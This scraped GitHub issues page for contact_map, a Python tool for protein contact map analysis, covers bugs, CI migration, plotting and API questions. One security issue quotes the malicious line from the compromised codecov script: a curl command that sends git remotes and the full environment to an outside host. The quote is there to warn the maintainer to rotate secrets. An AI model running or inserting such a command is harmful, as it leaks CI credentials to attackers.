dwhswenson / contact_map Goto Github PK

Contact map analysis for biomolecules; based on MDTraj

License: GNU Lesser General Public License v2.1

Python 99.80% Shell 0.20%

bioinformatics biochemistry protein-protein-interaction molecular-dynamics protein-ligand-interactions computational-biology

contact_map's People

Contributors

Stargazers

Watchers

Forkers

sroet arjunwadhawan efueger nicole-de-groot nffaruk tsenapathi fanwangm minghao2016 bio-otto hminu tienmphan vas2201 cecilia-fruet wook2014 kirjner byq008 luke-ebbis

contact_map's Issues

How are "contacts" defined?

Hi Dr. Swenson,
I am currently undertaking a Chemistry Master’s project in Dr. Toni Mey’s (@ppxasjsm) group at the University of Edinburgh. I have been using your contact map explorer programme to analyse protein-ligand binding interactions. It’s been a great help in determining which contacts are most common and was also very easy to use.
I have a question regarding what constitutes a “contact”. I have read on the documentation that a variety of both inter- and intramolecular contacts are found, but I wasn’t able to figure out how contacts are calculated and assigned. Could you please let me know what is classified as a contact and how they are calculated, or point me in the direction of the documentation? Furthermore, is there any functionality within contact map explorer to show which types of contacts are present? Thanks in advance for your response!
Victor

What to do with the new travis.com plan?

https://blog.travis-ci.com/2020-11-02-travis-ci-new-billing

So the big point for us would be:

For those of you who have been building on public repositories (on travis-ci.com, with no paid subscription), we will upgrade you to our trial (free) plan with a 10K credit allotment (which allows around 1000 minutes in a Linux environment).

So that seems they are giving a one time allotment of 1000 minutes (which would get us 67 nightly builds, at 15 min per build, and without you as a user running any other jobs) (The free plan explicitly says it does not replenish credits)

I found two options to go forward:

Apply for repeated open-source credits for this project

We will be offering an allotment of OSS minutes that will be reviewed and allocated on a case by case basis. Should you want to apply for these credits please open a request with Travis CI support stating that you’d like to be considered for the OSS allotment. Please include:

Your account name and VCS provider (like travis-ci.com/github/[your account name] )
How many credits (build minutes) you’d like to request (should your run out of credits again you can repeat
the process to request more or discuss a renewable amount)

Switch to Azure for CI https://azure.microsoft.com/en-us/blog/announcing-azure-pipelines-with-unlimited-ci-cd-minutes-for-open-source/

@dwhswenson do you have any other options/ an opinion on which way to go forward? (No worries if you don't have time to figure out the switch, I might be able to spend a couple hours figuring that out)

Looking around it seems like Azure is getting more and more adaptation so I am +0.5 on that option but I am willing to default to your opinion here

dask example not working

For me the dask example stopped working (test still runs fine):

I even tried to run it in pure python

>>> from dask.distributed import Client, LocalCluster
>>> import contact_map
>>> c = LocalCluster()
>>> client = Client(c)
>>> client
<Client: scheduler='tcp://127.0.0.1:37437' processes=4 cores=12>
>>> freq = contact_map.DaskContactFrequency(client=client, filename="5550217/kras.xtc", top="5550217/kras.pdb")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/sander/github_files/contact_map/contact_map/dask_runner.py", line 91, in __init__
    trajectory, query, haystack, cutoff, n_neighbors_ignored,
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 744, in __init__
    self._atom_contacts = self.convert_atom_contacts(atom_contacts)
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 653, in convert_atom_contacts
    for key, value in atom_contacts.items()}
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 653, in <dictcomp>
    for key, value in atom_contacts.items()}
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 200, in s_idx_to_idx
    return(self._all_atoms[idx])
IndexError: tuple index out of range

versions:
dask                      1.1.5                      py_0    conda-forge
dask-core                 1.1.5                      py_0    conda-forge
distributed               1.26.1                   py36_0    conda-forge
python                    3.6.7             h381d211_1004    conda-forge

"Autozoom" plotting

I find that I'm frequently doing something like:

plt.xlim(*contacts.query_residue_range)
plt.ylim(*contacts.haystack_residue_range)

This zooms my plot into just the query-by-haystack region. This should be the default behavior.

To get there, I'm suggesting the following:

[API BREAK] Replacing n_x, n_y in ContactCounter by query_range and haystack_range. The original idea of separate n_x and n_y was to do something like this, but the original implementation didn't work, and now everything just uses n_x = n_y = n_total (where total can be residues or atoms).
Adding a default parameter autozoom=True to the .plot and .plot_axes methods.
Updating the dpi warning in .plot to know what the autozoomed size will be.
[API BREAK] Remove ContactObject.query_residue_range, ContactObject.haystack_residue_range. They exist entirely for this purpose.

For discussion: is the query the x axis or the y axis?

[Security] invalidate all CI secrets

@dwhswenson

The github-action script of codecov was compromised to send the full CI env info to a third party. You might need to invalidate all CI secrets. (I don't know if you have any that are worht rotating, just makin sure you are aware of the issue)

codecov reference
mallicious added code line:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https://<redacted>/upload/v2 || true

Discussion: Moving off of AppVeyor

This issue is to discuss whether we should move away from AppVeyor as a testing platform. This is in part a response to problems in #118, although I've been thinking about this for a while.

Historically, we use AppVeyor because Travis-CI didn't have free Windows builds. Now we've moved from Travis-CI to GitHub Actions for our Linux builds. GitHub Actions does allow free Windows builds.

We also use two different build processes. The Linux builds install requirements with pip, getting packages from PyPI. The Windows builds use conda-build, getting packages from conda-forge. This can be nice because sometimes packages have slight differences in their dependencies (most frequently, they include some extras on conda-forge that don't come with the package when you install with pip). Testing both ensures that we aren't implicitly relying on something that only comes through one distribution mechanism.

The problems with the current Windows builds:

AppVeyor only allows one simultaneous build, so even running only 2 builds takes a while.
The actual build process (via conda-build) is slower on Windows, which exacerbates the problem of not having simultaneous builds.
With our current build process, we need to wait for AppVeyor to update Miniconda versions. Our build doesn't seem to work on their Miniconda38, and there is no Miniconda39. So we're limited to Python 3.7.
The conda-build based build is unnecessary. This is because I mimicked what MDTraj did. We don't actually need conda-build, since we're not compiling anything. We can install requirements with conda if we want. This will also get rid of the need for the recipe in devtools -- that recipe is completely independent of the conda forge feedstock recipe, and is only used for the AppVeyor build.

So I think it makes sense to move Windows builds over to GitHub Actions as well. I haven't used Windows builds on GHA yet, so I'd love to hear anyone else's experiences with it (@sroet, have you used that?)

A few specific points to consider:

Build matrix: Which versions do we test against? I suggest only 2 (to keep build matrix smaller) and having those be the newest version of Python and the oldest NEP29-required version, and only testing against the release version of MDTraj (we test against development builds on Linux).
Where to get packages from: I think we should drop conda-build, but maybe continue to get packages from conda.

Anything else to consider? Any thoughts on these?

how to extract some special contacts

Hi,

I'm trying to calculate the contact map related to helical structure. I first got the contacts from ContactTrajectory, and then tried to delete the items whose residues were not helical. But it doesn't work. Here is the part of my script:

contacts = ContactTrajectory(traj)
for i in range(nframe):
    pairs = contacts[i].residue_contacts.most_common()
    hels = dssp[i]     # information of residue helicity
    for idx, pair in enumerate(pairs):
        r1, r2 = pair[0][0], pair[0][1]
        if not (hels[r1.index] == 'H' and hels[r2.index] == 'H'):
            del contacts[i].residue_contacts.most_common()[idx]

I think I had some misunderstanding here. Any suggestions?
Thank you so much!

The calculated results are inconsistent with those calculated by amber cpptraj

Dear Developers, I'm counting multiple different peptides binding to a receptor and analyzing the differences in the contacts they make. Firstly, I used cpptraj to calculate a nativecontacts as a reference, because the results calculated using ContactFrequency could not display their residue numbers separately according to peptides and receptors, causing all the structures to be mixed together, even if I set the query and haystack. But this problem is only inconvenient, not fatal. I compared the results calculated by cpptraj and contact_map and found that the results calculated by cpptraj have more contact residue pairs and the contact frequency is much higher. How do I interpret this result?
My code is as follows：

freq = ContactFrequency(traj, query=ligand, haystack=receptor, cutoff=0.7)
contact_lists = []
freq.residue_contacts.most_common_idx()
for i in range(len(freq.residue_contacts.most_common_idx())):
tup = freq.residue_contacts.most_common_idx()[i]
if tup[1] >0.2:
contact_lists.append(list(tup[0])[1])
set(contact_lists)

and my cpptraj code:
nativatecontacts :1-255&!@h= :256-356&!@h= byresidue distance 7 out nc_by_frame.dat mindist maxdist
resout contact_frac_byres.dat \

Relevant results have been placed in the attachment
contact_frac_byres.txt

contact_map_output.txt

How to display contacts of atoms within the same residue?

I'm comparing contact maps between a single protein in 2 different conformations. I'm looking only at contacts of Nitrogen backbone with the rest of the protein (i.e. query == N, haystack is default). This works with no issues, except I've noticed the contacts are only between atoms of other amino acids with the one you are looking at. So you get something like
[ARG190-CB, VAL375-N] 1.0
But you will never get something like
[VAL375-CB, VAL375-N] 1.0

I was curious if there is a way to include the atom contacts within the same residue (while the N interaction with backbones change probably won't be much, side chains, especially long ones like Lysine, can undergo significant rearrangement relative to the amide backbone).

Changing colorbar font size

How do I go about chaning the font size of the colorbar?

Using:
fig, ax = frame_contacts.residue_contacts.plot(figsize=(50,50),cmap="plasma")
Increases the graph size but keeps the font size of the colorbar doesn't scale.
plt.xlabel("Residue",fontsize=50)
_ = plt.ylabel("Residue",fontsize=50)
ax.xaxis.set_tick_params(labelsize=30)
ax.yaxis.set_tick_params(labelsize=30)

Always show at least one pixel for plotting

It is currently possible (especially for atom-atom plots) for the size of one contact to be smaller than a single pixel. The result is that many contacts aren't actually shown. This is very misleading.

We should update the contact object plot such that the dimensions of the patch is guaranteed to be at least 1 pixel. Currently it gives 1 unit on the axis; we need to figure out how many units on the axis correspond to 1 pixel (via matplotlib's resolution).

I think it is fine if we slightly overestimate; this will be a min function, so it will still give a distance of 1 pixel if pixel_per_axis_unit > 1.

Regenerate webhook for read the docs

@dwhswenson I assume you got the same emails as me, but I don't have the permissions to fix it. (don't have admin rights on this repo or on RtD)

Our current RtD hook does not seems to use a secret, which will be required from January 31!
You should click on the 3 links, and "resync webhooks" which should update the secret.
(couldn't test it though, if I try it I get the error: Webhook activation failed. Make sure you have the necessary permissions.)

ContactMap/ContactFrequency on a set of individual pdb (not trajectory)

I'm working with protein-protein docking output and would like to use ContactMap/ContactFrequency to classify the contacts formed in a set of protein-protein complexes.

Basically, I have a condition (condition A) that leads to a set of protein-protein complexes. I have another condition (condition B) that leads to a different set of protein-protein complexes.

I'd like to assess differences between the contacts formed in complexes under condition A and contacts formed in complexes under condition B. What would be the best way to do this? I have multi-structure PDB files for both condition A and condition B.

Move from travis.org -> travis.com/github actions

I just saw this issue pop up on some other code I was watching.

We should also probably think about migrating away (and auto-release as well)
Here is the travis-ci documentation on this issue: https://docs.travis-ci.com/user/migrate/open-source-repository-migration.

I am pretty sure this has to be done by the owner of this repo, so @dwhswenson this one is assigned to you

Renaming `ContactFrequency` to `ContactMap`; removing old `ContactMap`

Current status (tl;dr for users): For a single-frame contact map, you should use ContactFrequency with a single-frame trajectory.

#cmap = ContactMap(traj, frame=0)  # old
cmap = ContactFrequency(traj[0])  # new

As of the 0.7.0 (including the development branch), using ContactMap will give an error.

(original post follows)

Currently, Contact Map Explorer has classes ContactMap and ContactFrequency. Really, a ContactMap is nearly indistiguishable from a ContactFrequency with only one frame -- at least, I don't think there's anything ContactMap does that ContactFrequency doesn't -- so it seems logical to remove the extra code.

Here's my proposed process for doing that:

0.6.0: Deprecate ContactMap
0.7.0: Remove ContactMap; leave a function that gives an error saying to use ContactFrequency. Also, FutureDeprecationWarning on Contact Frequency for the name change to ContactMap
0.8.0 or 1.0.0: Deprecate ContactFrequency, with the ContactMap name preferred. Leave a deprecated ContactFrequency until 2.0 (which may be a very long time).

Each release will also include other features, but I'm going to encourage a fast release cycle here (add a new feature-level change? good reason for a new release!) Unfortunately, that also means that even if this is a reasonable timeline in terms of version numbers, it'll be a fast timeline in terms of months. (I hope.)

Thoughts on this? I plan to pin this issue for a while well after the rename is complete, so any confused users can easily find it.

ContactFrequency to pandas dataframe

Dear all,

I really like using ContactMap Explorer! I was wandering if there is a way to create a pandas dataframe out of a ContactFrequency calculation.

Like:

traj=mdt.load('trajectory.h5')
peptide = topology.select('chainid 1 and element != "H"')
protein = topology.select('chainid 0 and resid 77 or resid 124 or resid 130 or resid 137 and element != "H"')
contacts = ContactFrequency(traj, query=peptide, haystack=protein, cutoff=0.45)
df=pd.DataFrame(contacts)

where the query would be the columns and the haystack the rows or the other way round, doesn't matter.

Thanks for your effort!
Have a nice day.

Residue_Contacts() generates contacts beyond the cutoff and plot() and most_common() contacts do not match

I'm a bit confused why I am getting this behavior, I am using chain A of PDBs 1mmi and 1jql

Looking at the contact map difference

import mdtraj as md
from contact_map import ContactFrequency
from contact_map import AtomMismatchedContactDifference
import matplotlib.pyplot as plt


extended_monomer=md.load('1mmi.pdb')
bent_monomer=md.load('1jql.pdb')
extended_map=ContactFrequency(extended_monomer)
bent_map=ContactFrequency(bent_monomer)
difference = AtomMismatchedContactDifference(extended_map, bent_map)
difference.residue_contacts.plot()
plt.show()

We can see a contact being formed via 136/353. Looking at the pdb for these residues, they are not even remotely close (20A away). The same is also true of contacts 140/356 and 140/358.

What's strange is if I try and look at the contacts for 353

difference.residue_contacts.most_common(difference.topology.residue(353))

For 1, it doesn't connect to the proper residue

[([SER354, ALA357], 1.0), ([ARG137, SER354], 1.0), ([SER354, GLU350], 0.0), ([SER354, ASP351], 0.0)]

I don't know why it's connecting to the residue after it (i.e. 354 instead of 353). But for 2, even if we look at SER354, none of these matches line up with the contact map plot. The same is true of ALA353, it shows contacts in the plot, but nothing in the most_common(). This is because there is a difference between most_common() and the plot. If I look at the pair_list for SER354

[354, 349] 0.0
[336, 354] -1.0

Versus the most_common() output for SER354

[([SER354, ALA357], 1.0), ([ARG137, SER354], 1.0), ([SER354, GLU350], 0.0), ([SER354, ASP351], 0.0)]

There are completely different. The same is true for ALA357, where most_common() showed no contacts, but looking at the pair_list being plotted

[353, 356] 1.0
[353, 349] 0.0
[353, 350] 0.0
[136, 353] 1.0

We can see there are actually 2 contacts (one of them being the non-sense 136/353.Same with SER354, we can see a non-sense contact ([ARG137, SER354], 1.0), these are much further than the cut-off to make sense. Setting the cutoff manually does not fix this.

What's interesting is this appears to be an issue isolated to residue_contacts(). If I modify the pdb files so that their atoms perfectly match. The contacts make sense (SER368 is the same as SER354, just different numbering)

([SER368-N, ASP365-OD2], 0.0) ([SER368-N, ASP365-O], 0.0) ([SER368-N, ASP365-CB], 0.0) ([SER368-N, ASP365-OD1], 0.0) ([SER368-N, ASP365-CG], 0.0) ([SER368-N, ASP365-C], -1.0)

However the contact map plot for the identical atom pdbs doesn't match the contacts. If we look at the pairs being plotted

[368, 189] 0.0 [368, 358] 0.0 [368, 359] 0.0 [368, 191] 0.0 [360, 368] 0.0 [368, 190] 0.0

For 1, it differs from the most_common() contacts.
[([GLU364, SER368], 0.0), ([ASP365, SER368], 0.0), ([SER368, ARG151], -1.0), ([SER368, ALA371], -1.0)]
For 2 it has non-sensical results again (368/190 is 20A apart).

Furthermore, the command

difference.residue_contacts.most_common(difference.topology.residue(364))

is offset by 4 in this scenario for some reason (i.e. res 364 coincides with 368 matches, it should be noted this is only when attempting to use this command. If I loop through the contacts themselves

for items in difference.residue_contacts.most_common():
	if str(items[0][0]) == 'SER368' or str(items[0][1]) == 'SER368':
		print(items)

This has no issue.

So in total, there appears to be 3 issues:

The plots do not match the contacts in most_common(). Whether the atoms are identical, or if AtomMismatchedContactDifference is used. Either method results in matches where the contact map plot does not correlate with the contacts themselves. I do not know if this was intentional
The residue_contacts() generates non-sensical contacts far beyond the cutoff. Contacts that do not exist when using residue_atoms (which makes contacts that do make sense)
difference.residue_contacts.most_common(difference.topology.residue(res)) has an indexing issue (looping through difference.residue_contacts.most_common() shows there is nothing offset in there, so the issue is with the topology.residue itself.

I have tested all the above issues playing around with neighbors ignored, different querys, and different cutoffs. They did not fix any of the above problems. These were tested in a virtual environment.

I don't quite know where these problems are arising.

Smarter loading for Dask based implementations

As mentioned in #101 , there are some limitations on the DaskContactFrequency, mainly:

The whole trajectory has to fit into memory as it is loaded once to figure out the length and then for every worker to slice out their trajectory.
We only support the loading of 1 trajectory file at the moment.

Both these issues should be solvable with a somewhat smart implementation of mdtraj.iterload with a sensible skip and splitting out trajectories.

UnboundLocalError: local variable 'unitcell_lengths' referenced before assignment

I was trying to generate the contact frequency map using my .xtc and .pdb file. However, it has this error. I used the .xtc and .pdb files in the example and it works well. I don't know if there is anything wrong with my .xtc or .pdb file? Thank you for your help!

Bug in atom_contacts.sparse_matrix in ContactFrequency

when running the following code in the IPython notebook:

trajectory_contacts = ContactFrequency(traj[0:2])
ac = trajectory_contacts.atom_contacts.sparse_matrix

I get the following error:

---------------------------------------------------------------------------
IndexError                                Traceback (most recent call last)
<ipython-input-10-f9dfcb5a25ab> in <module>()
----> 1 get_ipython().run_cell_magic(u'time', u'', u'trajectory_contacts = ContactFrequency(traj[0:2])\nac = trajectory_contacts.atom_contacts.sparse_matrix')

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/IPython/core/interactiveshell.pyc in run_cell_magic(self, magic_name, line, cell)
   2113             magic_arg_s = self.var_expand(line, stack_depth)
   2114             with self.builtin_trap:
-> 2115                 result = fn(magic_arg_s, cell)
   2116             return result
   2117 

<decorator-gen-59> in time(self, line, cell, local_ns)

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/IPython/core/magic.pyc in <lambda>(f, *a, **k)
    186     # but it's overkill for just that one bit of state.
    187     def magic_deco(arg):
--> 188         call = lambda f, *a, **k: f(*a, **k)
    189 
    190         if callable(arg):

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/IPython/core/magics/execution.pyc in time(self, line, cell, local_ns)
   1183         else:
   1184             st = clock2()
-> 1185             exec(code, glob, local_ns)
   1186             end = clock2()
   1187             out = None

<timed exec> in <module>()

/home/sanderroet/github_files/contact_map/contact_map/contact_map.pyc in sparse_matrix(self)
    114         for (k, v) in self._counter.items():
    115             key = list(k)
--> 116             mtx[key[0], key[1]] = v
    117             mtx[key[1], key[0]] = v
    118         return mtx

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/scipy/sparse/dok.pyc in __setitem__(self, index, x)
    268         if min_i < -self.shape[0] or i.max() >= self.shape[0]:
    269             raise IndexError('index (%d) out of range -%d to %d)' %
--> 270                              (i.min(), self.shape[0], self.shape[0]-1))
    271         if min_i < 0:
    272             i = i.copy()

IndexError: index (2457) out of range -1357 to 1356)

While the code works for

frame_contacts = ContactMap(traj[0])
sm = frame_contacts.atom_contacts.sparse_matrix

Enhancement: ContactTrajectory class (with movies!)

It might be nice to add a ContactTrajectory class. This would store a separate (single frame) contact map for each time slice. Then you could do interesting things like create a ContactFrequency based on a set of frames determined after the fact. You could also create movies of how the contact map evolves in time (these should be based on some windowing into ContactFrequency instances; the window can be 1 if the user wants).

Relevant matplotlib docs on animation:

Animations that could be generated in real time would be impressive, but I'd be just as happy with something that pre-generates the images and makes a movie out of them, like ArtistAnimation does.

Note that, to use a rolling window to generate the contact frequency plots for each movie frame, we already have add_contact_frequency and subtract_contact_frequency methods. These affect the absolute histogram count, unlike ContactDifference, which compares the after-normalization (to number of frames) contact frequencies. We'd still output a separate plot at each time step, but the underlying data would be cheaper to calculate.

Renaming `master` branch to `main`

I'm planning to rename the master branch here to main. My thoughts on this are fully discussed in openpathsampling/openpathsampling#956, so I won't repeat them here.

With the exceptions of Contact Map Explorer and OpenPathSampling, all projects that I maintain on PyPI have already made this switch -- I've been working up from the small projects to the larger ones.

Here are instructions that users will need to follow to make this change (note you'll have to change the default branch of your fork via the GitHub web interface).

As for timing, I'd like to do this immediately after we release 0.8 (which is waiting on two currently open PRs plus one PR I need to open that renames ContactFrequency as ContactMap).

Fix docs build problems

We're having problems building the docs on RTD. I think this is the same problem as readthedocs/readthedocs.org#5220, and is likely related to memory issues (see https://docs.readthedocs.io/en/stable/guides/build-using-too-many-resources.html).

I think the possible fixes are:

Pin versions in the RTD docs environment.yml (as with geopandas/geopandas#932)
Don't use conda for RTD install. Perhaps we don't need all reqs to build the docs?

Self-assigning, since I'm the only one with access to the docs on RTD.

How to calculate the CA distance between two residues？

Besides，

According to the PDB file of a protein, we acquired the coordinate of the Ca
atom of each amino acid residue, and then calculated the Euclidean
distances between all residue pairs.

How to realize the above in contact_map?

Use Google Colab to load ipynb examples directly from documentation?

Looking at this link.
Together with !pip install contact-map jupyter magic It should be feasible to allow people to run our examples from the website directly in their browser, without any download required.
I think this would be a good idea to implement in our read the docs template for the examples (especially the badge mentioned in the link).

@dwhswenson what do you think?

Contact Difference of two trajectories

Dear all,

Contact Map Explorer was recommended to me and so far I really like it! I am looking at two peptide trajectories. What I want to do next, but can't get done, is to compare two trajectories with ContactDifference. I created the two ContactFrequencies

trajectory_contacts2 = ContactFrequency(traj2, cutoff=0.55)
trajectory_contacts2 = ContactFrequency(traj2, cutoff=0.55)

, but, when I do diff=ContactDifference(trajectory_contacts1, trajectory_contacts2) I get the error:

AssertionError: Incompatible ContactObjects:
        topology: <mdtraj.Topology with 1 chains, 15 residues, 258 atoms, 262 bonds> != <mdtraj.Topology with 1 chains, 15 residues, 239 atoms, 243 bonds>

which is true, the number of atoms is different, but the number of residue is the same.

My question is: Is there a way to substract them from another to generate a Difference plot?
If not, can I get the values of the contact map to do this manually?

Any help or hint is appreciated,
Thank you :)

Subplots for ContactFrequency

Hello again, how would we go about arranging the plots generated through the plot method of ContactCount for different trajectories as subplots? I've tried this Stack answer without any luck. Perhaps there should be an option to provide an existing figure or axis object to the plotting method? Thank you,

Error while saving DaskContactFrequency & DaskContactTrajectory instances to pkl file

When attempting to save a DaskContactTrajectory instance or DaskContactTrajectory instance to a pkl file, I receive the following error message:

---------------------------------------------------------------------------
AttributeError                            Traceback (most recent call last)
Cell In[13], line 1
----> 1 freq.save_to_file("contacts.p")

File /panfs/jay/groups/21/sarupria/gopal145/software/contact_map/contact_map/contact_map.py:371, in ContactObject.save_to_file(self, filename, mode)
    356 """Save this object to the given file.
    357 
    358 Parameters
   (...)
    368 from_file : load from generated file
    369 """
    370 with open(filename, mode+"b") as f:
--> 371     pickle.dump(self, f)

AttributeError: Can't pickle local object 'Client.__init__.<locals>.<lambda>'

From an online search, it appears that saving to a pkl file should avoid having lambda functions calls in the pickled data. I am unable to find any lambda function calls in the save_to_file method or in the dask_runner module.

Option to turn off topology compatibility check in `ContactDifference`

Let's say I have a trajectory of a wild type protein and a trajectory of that protein with a point mutation. I might be interested in looking at the difference in the (residue) contact maps for these. The current code forbids it, because ContactDifference requires that topologies between the two contact frequencies be equal.

I think we can make this possible with the following:

Add a check_topology parameter to ContactObject._check_compatibility (defaults to True).
Add a check_topology parameter to ContactDifference.__init__ (defaults to True). If check_topology is False and if positive.topology != negative.topology, then it will refuse to build the atom_contacts, but will build the residue_contacts.

The only way you'll be able to build this will be with diff = ContactDifference(pos, neg, check_topology=False) -- so a user has to really intend to do this for it to happen. But at least it is possible.

@sroet : Am I overlooking anything scientifically in this? Can you think of any reason that this wouldn't work?

The idea presented here would only work to compare trajectories with point mutations. I've been thinking about some "re-topologizing" functionality for MDTraj (e.g., breaking a single residue into parts). Including the possibility of inserting some empty residues would enable users to create meaningful contact map differences between different proteins, as long as they can create a sequence alignment.